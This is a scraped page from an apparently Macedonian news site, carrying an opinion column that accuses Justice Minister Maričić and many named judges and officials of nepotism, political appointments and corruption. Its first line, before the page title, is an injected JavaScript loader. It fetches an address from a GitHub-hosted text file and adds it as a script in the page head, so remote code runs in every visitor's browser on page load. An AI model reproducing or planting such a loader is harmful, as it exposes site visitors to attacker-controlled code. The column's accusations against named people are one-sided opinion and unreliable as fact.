;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Дали треба да се прочистиш Маричиќ? - Антропол
АктуелноЛокалноСтав

Дали треба да се прочистиш Маричиќ?

Пишува: Ѓорѓи Илиевски (Виш просветен инспектор)


Пред три месеци, поточно на почетокот во септември оваа година ви напишав за состојбите на третата Власт, односно за правосудството, на крајот од тој мој допис напишав цитирам:

„Министре Маричиќ, Вие ништо не можете да направите за состојбите во правосудството. Од проста причина. Вие сте поставени од премиерот Заев, ќе бидете негов подлизурко. Второ, заменик министер за правда ќе ви биде Агим Нухиу,  човек кој незаконски се унапредувал во наставно-научно звање вонреден професор. Кој незаконски земал хонорари на Правниот факултет во Тетово.Човек кој направил образовен криминал.

За каква правда, правен систем зборувате или за криминал и корупција, кој секојдневно гледаме што се случува на овој план со луѓето блиски на партијата СДСМ и ДУИ. За сето напред наведено, информирани се амбасадите во Македонија. Со што ќе видиме како ќе се спроведат преговорите за членство во ЕУ во однос на Поглавјето 23-судство и темелните права и во делот на Поглавјето 24-правда, слобода и безбедност. Ги чекаме вашите сто дена!!!“.

Дојдоа стотте дена, Ве потсетувам на вашата прва  изјава од преземањето на Министерството за правда дека „ќе се врши прочистување во правосудството, прочистување и деполитизација на судството и обвинителството во првите сто дена, за борба против криминалот и корупцијата…“ Од тоа што има. Има едно големо НИШТО.

Деновиве изјавуваш: „ …за потреба од враќање на јавната доверба во системот против  корупцијата и криминалот”, велите „многу е важно обвинителството да ги продолжи постапките со ефикасно постапување пред судовите, а судовите да ги  завршат постапките со конечни пресуди ….“. И што има од тоа едно големо НИШТО.

Ама без срам и перде изјавуваш: „Со моето доаѓање  во Министерството за правда најавив за неколку месеци ЌЕ (идно време, кога?) објавам Методологија според која ќе се филтрира судството и обвинителството. Изработката  на методологијата…е во завршна фаза иако (пазите смешно) пандемијата малку не забави…“. Ова е трагикомично како што ќе рече Гогољ или Цанкар. Јас ќе го цитирам неговиот ментор Заев: „Мало сутра“. И истово дете (Маричиќ) поднаучено од работата од „невладините“ организации, финансирани од странски пари, како и од владиниот сектор изјавува:„…очекува конкретни  насоки  и временски рамки од Судскиот совет и Советот на Јавни обвинители, како ќе ги прочистат своите редови и која ќе биде улогата на ДКСК“.

Е, министре како што велиш за „правда“. За овие сто дена направи едно големо НИШТО.

Е сега да те потсетам, што ти пишував по македонските портали (за ова се запознати како што наведов со отворено писмо Амбасадорите во Македонија од моја страна). Пред три месеци поранешната министерка за правда, Рената Дескоска, сама себе си се номинира за член на Венецијанската комисија. Истата воведе критериуми за сите оние кои полагаат правосуден испит да ги поседуваат книгите на нејзиниот сопруг Тони Дескоски…. Да биде скандалот поголем, како министерка за „правда“ Дескоска, целосно ја партизира и Комисијата за правосуден испит. Во самата комисија има низа конфликти на интереси. Ќе наведам некои:

-именувањето на сестрата на пратеничката од СДСМ Снежана Калевска Ванчева, Антоанела Димовска;

-именувањето на Тања Милева, сопруга на поранешниот кандидат за градоначалник на СДСМ од Радовиш и поранешен член на ДИК Игор Милев;

-именувањето на пријателот на Заев, претседателот на Апелациониот суд во Штип Наќе Георгиев;

-потоа именување на струмички судија чија сопруга е јавен обвинител во Струмица;

– именувањето на поранешниот претседател на ДИК, Александар Чичаковски.

Со ваквите именувања од страна на поранешниот министер за „правда“ Рената Дескоска, полагањето на правосуден испит ќе зависи од субјективната проценка на Kомисијата, дали кандидатите биле или се активни подржувачи на политиката на СДСМ и Зоран Заев. Ова е школски пример за непотизам, партизација и корупција….како советник на Заев, иако и ви сте учествувале во како што изјавува Зоран Заев дека „судството го отворил како пупка“, еве ви го  распупеното судство и начинот на напредувањето по политички нарачки:

-Судијата Гордана Спиреска определи притвор по барање на СЈО за Сеад Кочан, сега по награда е член на Судскиот совет;

-Судијата Лидија Трајковска Зимбовска е унапредена на судии во Апелациониот суд Скопје

-Судијата Ѓоко Ристов е унапреден (политичка награда) во Апелациониот суд Скопје, кој за насилството го опомена Курто Дудуш градоначалникот на Заев од Шутка;

-Судиите Сафет Кадрии и Цветанка Периќ се унапредени во Врховен суд.

– Против судиите во Врховен суд кои одлучуваа за предметот Кочан и тоа: Јово Вангеловски, Ристо Катавеновски, Фаик Арслани, Џемали Саити, Рахилка Стојковска и Ќиро Здравевима интересна ситуација. Судијата Ќиро Здравев е унапреден во претседател  на Судскиот совет, судијата Фаик Арслани е в.д.Претседател на Врховен суд. Она што е интересно што за сите овие судии од Врховен суд, Судскиот совет за сите поведе постапка за разрешување, но на интересен начин постапката е запрена за унапредените, а разрешени се Вангеловски, Стојковска и Катавеновски, токму така како што Зоран Заев нарачува и се фали по објавена „аудио бомба“.

Ова е доказ дека судството е во рацете на политички послушници. Понатака министре Маричиќ, ќе видиме дали ќе покренете барање од правосудните органи во Македонија, а во однос до каде се Хашките случаи, поконкретно, случајот познат како „Водство на ОНА“ кој беше вратен за да постапуваат по него македонските судски органи. Тоа не значи дека Хаг за македонската јавност е помалку важно од горката реалност како Хашките случаи всушност се третираат дома од нашиот правосуден систем. А одговорот е никаков. Од формално правно непознати причини и тоа повеќе од десетина години четирите вратени случаи од Хаг, кои требаше да се процесуираат и судат кај нас, не се ниту почнати…

Само така ќе се потврди дека навистина вистински, а не само декларативно, се залагате за некаква европски вредности, меѓу кои владеењето на правото е несомнено на прво место. Токму и самиот Абаз (Али Ахмети) има изјавувано дека не смее да има бели мечки, односно недопирливи функционери пред судот на правдата. Но, децениското непостапување и неотворање на овие случаи остава впечаток дека некои државни функционери, сепак, уживаат статус на заштитени бели мечки…

Понатака, дали ќе покрените постапки за судските случаи за кои е запознат и Судскиот совет и неговиот претседател Киро Здравев. Се работи за Основниот суд Струга каде повеќе од пет години се водат судски прекршочни постапки од страна на Државниот просветен инспекторат против Меѓународниот универзитет Струга. Запознати се и амбасадите во нашава држава дека повеќето донесени прекршочни постапки се ослободителни. Пресудите се однапред јасни. Не може да се пресуди ништо против струшкиот универзитет, зашто некои судии од струшкиот, битолскиот и Управниот суд се, или биле вклучени, во активности на овој универзитет. Кон оваа треба да се додаде и политичкиот момент поради блискоста на некои политички активисти со овој универзитет.

На овој универзитет се констатирани законски пропусти согласно Законот за високо образование со ненострифицирани 800 дипломи на странски студенти, ненострифицирани дипломи и избор во наставно-научни звања како што е примерот со градоначалникот на Струга – Рамиз Мерко, потоа на нотарката Беса Кадриу во наставно научно звање доцент, понатаму ангажираноста на заменик-министерот за внатрешни работи Агим Нухиу, а градоначалникот дури и во вонреден професор. Или  донесената најнова пресуда во овој струшки суд од страна на судијата Фатмир Даути кој носи ослободителна пресуда за ректорот на овој струшки универзитет извршен врз Државни просветни инспектори кои неможат да си ја извршат службено својата работа.

За Основниот суд во Тетово, каде од страна на Државниот просветен инспекторат се поднесени прекршочни пријави за јавни функционери и тоа против (поранешниот) министер за образование и наука Арбер Адеми, заменик министерот за внатрешни работи Агим Нухиу и директорот на индустриска сопственост Сафет Емрули (сите од Универзитетот Тетово – Правен факултет). Посебно за судиите Јасмина Лазароска и Хуриете Цека кои  носат ослободителни пресуди. Донесените пресуди од страна на судиите се пристрасни, непочитување на еднаквост и рамноправност и не се врз основа на владеење на правото. Јас би додал дека се тенденциозни и непринципиелни.

За какви судии станува збор, каде е нивната професионалност,  независност и правичност? Или што ќе превземете Маричиќ по известувањето од страна на Советот на јавни обвинители на Македонија ПО.бр.53/20 од 05.08.2020г. дека министерот за образование и наука Арбер Адеми, заменик министерот за внатрешни работи Агим Нухиу и директорот на индустриска сопственост Сафет Емрули (сите од Универзитетот Тетово – Правен факултет) – во периодот од нивното стапување на функција имаат користено средства по основ на договори за давање интелектуални услуги на Универзитетот Tетово на Правниот факултет,  преку Македонската авторска агенција А.Д. Скопје, што е спротивно на Законот за високо образование и Законот за Влада. Тоа е констатирано и од страна на ДКСК, како и од  страна на Управата на финасиската полиција. И  не се поведува кривична пријава. Која е пораката министер Маричиќ „крадете функционери, ако ве фатат парите вратете ги нема да одговарате“.

Што ќе преземете против Јавниот обвинител Басир Алиу од ЈО-Тетово или против член на советот на јавни обвинители Арбер Исаку/ Arber Isaku). Ништо не можете да превземете, тоа се колеги на вашиот родител, воедно и блиски на Агим Нухиу(зам.министер за внатрешни работи, сега зам министер за правда).

Со напред наведеното министре за „правда“ Маричиќ, ти останува, прво треба да се прочистиш во душата со „ЛИНЕКС“. Па ти останува неминовна оставка од ова за тебе недорасната функција. И оди сургун во „невладини организации на проекти“.

ЧАО!


Ставовите и мислењата изнесени во колумната не ги претставуваат ставовите на Редакцијата.